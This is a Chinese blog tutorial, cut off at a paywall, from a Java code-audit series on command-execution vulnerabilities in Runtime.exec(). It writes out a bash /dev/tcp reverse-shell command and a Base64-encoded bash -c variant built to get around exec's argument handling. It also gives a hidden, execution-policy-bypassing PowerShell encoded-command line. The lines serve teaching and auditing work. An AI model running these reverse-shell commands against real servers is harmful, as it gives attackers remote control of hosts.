【Java代码审计 | 第十篇】命令执行漏洞成因、防范及审计思路

原创 已于 2025-03-19 11:38:59 修改 · 1.3k 阅读 · 22 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#java #命令执行

于 2025-03-07 20:08:26 首次发布

未经许可,不得转载。

文章目录

在这里插入图片描述

命令执行漏洞是指攻击者能够通过应用程序执行任意系统命令,从而控制服务器或获取敏感信息。这种漏洞通常发生在应用程序直接调用系统命令且未对用户输入进行严格过滤的情况下。本文将分析 Java 中的命令执行漏洞,并提供防范措施。

Java 执行系统命令的函数

在 Java 中,常用的执行系统命令的函数包括:

1、Runtime.getRuntime().exec()

通过 Runtime 类的 exec() 方法执行系统命令。

// 使用 Runtime.exec() 执行命令
Runtime.getRuntime().exec("ping " + userInput);

注意,在 Java 中,尽管可以使用 Runtime.getRuntime().exec() 执行系统命令,但与 PHP 不同的是,Java 会将传入到该函数的参数视为一个完整的字符串,而不会受到 Shell 特殊符号(如 &、;、|)的影响,从而在一定程度上降低了命令注入的风险。

在涉及 Runtime.exec() 类型的远程代码执行(RCE)时,如果需要反弹 Shell,则必须进行特殊处理。直接执行以下命令无法成功反弹 Shell:

原始命令(Linux 环境):

bash -i >& /dev/tcp/127.0.0.1/12345 0>&1

这是因为 Java 直接将参数传递给 exec(),而不会经过 Shell 解析,因此必须对命令进行适当转换。可以使用 Base64 编码绕过限制,再通过 bash -c 进行解码和执行:

处理后的命令:

bash -c {
   
   echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMTIzNDUgMD4mMQ==}|{
   
   base64,-d}|{
   
   bash,-i}

对于 Windows 环境,PowerShell 反弹 Shell 也需要类似的处理。可以使用 -EncodedCommand 传递 Base64 编码后的命令:

处理后的 PowerShell 命令:

powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwAuAGUAeABlAA==

最低0.47元/天 解锁文章

200万优质内容无限畅学
Java代码审计命令执行漏洞
悦分享
08-02 1055
执行了ls&&结果报错,看显示结果发现过滤了&&,然后把&转编码发现还是会报错,但是从服务端代码来看并没有做参数的过滤。从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。进行代码审计时遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。...
Java代码审计】RCE篇
大河之犬的博客
12-21 1937
命令注入(RCE)是指在某种开发需求中,需要引入对系统本地命令的支持来完成某些特定的功能。当未对可控输入的参数进行严格的过滤时,则有可能发生命令注入。攻击者可以使用命令注入来执行系统终端命令,直接接管服务器的控制权限。
[JAVA安全]CVE-2022-33980命令执行漏洞分析
snowlyzz的博客
01-11 2548
JAVA CVE-2022-33980命令执行漏洞分析
java命令执行审计思路
weixin_45653478的博客
06-30 707
无法执行的原因: Clazz.newInstance() 中要求访问目标类构造函数,由于 java.lang.Runtime 的构造函数 私有,所以执行失败。Clazz.newInstance() 中要求访问目标类构造函数,由于 java.lang.Runtime 的构造函数 私有,所以执行失败。//获取到要调用的方法:java.lang.ProcessImpl,start,并且按照规范传递相关的参数。写法一: 通过java.lang.Runtime类内部方法getRuntime()获取当前实例。
悬镜安全丨Java 反序列化任意代码执行漏洞分析与利用
Anprou的博客
11-14 6120
利用国内的漏洞利用工具
Java代码审计 | 第七篇】文件上传方式、漏洞成因防范审计思路
等风来
03-07 1503
文件上传漏洞是指攻击者通过上传恶意文件(如可执行脚本、病毒、木马等)到服务器,从而执行恶意操作或获取服务器控制权的安全漏洞。一般发生在应用程序未对上传的文件进行严格的验证和限制时。使用经过验证的文件上传库(如 Apache Commons FileUpload),并确保库的版本是最新的。使用随机文件名保存上传的文件,避免攻击者通过文件名猜测文件路径。:文件上传路径未做限制,攻击者可以通过构造特殊文件名(如。:未验证文件类型和扩展名,攻击者可以上传任意文件(如。)验证文件内容是否与扩展名匹配。
Java代码审计 | 第十一篇】SSRF漏洞成因防范审计思路
等风来
03-09 799
SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种安全漏洞,攻击者可以利用该漏洞诱使服务器向内部或外部的任意系统发起请求。通过SSRF,攻击者可以绕过防火墙或访问限制,访问内部资源,甚至攻击内网中的其他服务。常见的攻击场景包括:访问内网中的敏感数据。扫描内网端口和服务。利用服务器作为跳板攻击其他系统。访问云服务元数据(如AWS的元数据服务)。
Java代码审计 | 第十三篇】XXE漏洞成因防范审计思路
最新发布
等风来
03-09 915
XXE(XML External Entity,XML外部实体注入) 是一种安全漏洞,攻击者通过利用XML解析器处理外部实体的功能,读取本地文件、发起网络请求或导致拒绝服务攻击。XXE通常发生在应用程序解析用户提供的XML输入时,未禁用外部实体解析的情况下。禁用外部实体解析、对用户提供的XML输入进行严格的验证、选择默认禁用外部实体解析的库,或在初始化时显式禁用。1、读取本地文件:通过加载外部实体,读取服务器上的敏感文件(如/etc/passwd)。风险:如果未禁用外部实体解析,可能导致XXE漏洞
Java代码审计之远程命令执行漏洞(REC)详解
悦分享
01-23 745
在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。RCE漏洞,可让攻击者直接向后台服务器远程注入操做系统命令或者代码,从而控制后台系统。很多人喜欢把代码执行漏洞称为命令执行漏洞,因为命令执行漏洞可以执行系统命令,而代码执行漏洞也会执行系统命令,这样就容易混淆。
java中Runtime.exec()可能带来的命令注入安全问题的解决办法
feinifi的博客
03-25 4772
runtime.exec(command)存在命令注入风险的解决办法,采用三方框架esapi对部分命令进行过编码校验,三个配置文件缺一不可,只对部分命令进行校验,不是整个命令。
命令执行漏洞 java_命令执行漏洞
weixin_39663970的博客
02-19 1237
命令执行漏洞:属于代码执行漏洞的范畴命令执行漏洞的原理:在操作系统中,“&、|||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令command1|command2 直接执行后面的语句command1&command2 两个命令同时执行command1&&command2 只有前面...
命令执行漏洞 java_白帽子挖洞—命令执行(Commnd Execution)篇
weixin_35117981的博客
02-19 1116
0x00介绍命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。漏洞成因:脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些除去web的特殊功能时,就需要调...
java命令执行漏洞揭秘
chengxuyuanlaow的博客
08-01 636
注意:java的Runtime.getRuntime.exec和ProcessBuilder.start,都是直接启动传入参数对应的进程,如果只是命令执行的部分参数可控,想在java中通过;、|、&等实现命令注入是行不通的, 例如这样传入命令是无法执行的。
Java代码审计命令执行
liguangyao213的博客
03-13 2453
java代码审计系统课程--代码审计视频教程-信息安全-CSDN程序员研修院少写“漏洞” 了解常见代码安全 提升代码安全能力 代码不被黑客黑-https://edu.csdn.net/course/detail/32634 命令执行(CommandInject) codeinject 访问url为http://localhost:8080/codeinject?filepath=src%26%26ipconfig 获取一个参数filepath,然后通过ProcessBuilder将数组cmdList
java代码审计--命令执行
goddemon
09-15 738
1.java常用执行系统命令函数 Runtime.exec Process GroovyShell.evaluate ProcessBuilder.start() 2.补充知识点 Process类方法: 1.destroy() 杀掉子进程。 2.exitValue() 返回子进程的出口值。 3.InputStream getErrorStream() 获得子进程的错误流。 4.InputStream getInputStream() 获得子进程的输入流。 5.OutputStream getOutput
学习笔记-java代码审计-命令执行
人饭子的博客
11-13 496
java代码审计-命令执行 0x01 漏洞挖掘 String cmd = request.getParameter("cmd"); Runtime runtime = Runtime.getRuntime(); //Runtime.getRuntime.exec ProcessBuilder processBuilder = new ProcessBuilder(cmd); //ProcessB...
Java代码漏洞检测-常见漏洞与修复建议
dzqxwzoe的博客
05-29 4008
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
JAVA代码审计命令执行基础
weixin_68408599的博客
05-16 984
学习JAVA代码审计,首先需要知道JAVA底层代码的逻辑,以下是相关命令执行的函数,我将以底层逻辑来进行演示。
DAY23:命令执行&代码执行漏洞
qq_49433473的博客
08-04 1112
命令执行漏洞、代码执行漏洞,Log4j2复现,PHPMailer远程命令执行漏洞复现 函数学习,绕过方式,Bypass技巧
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值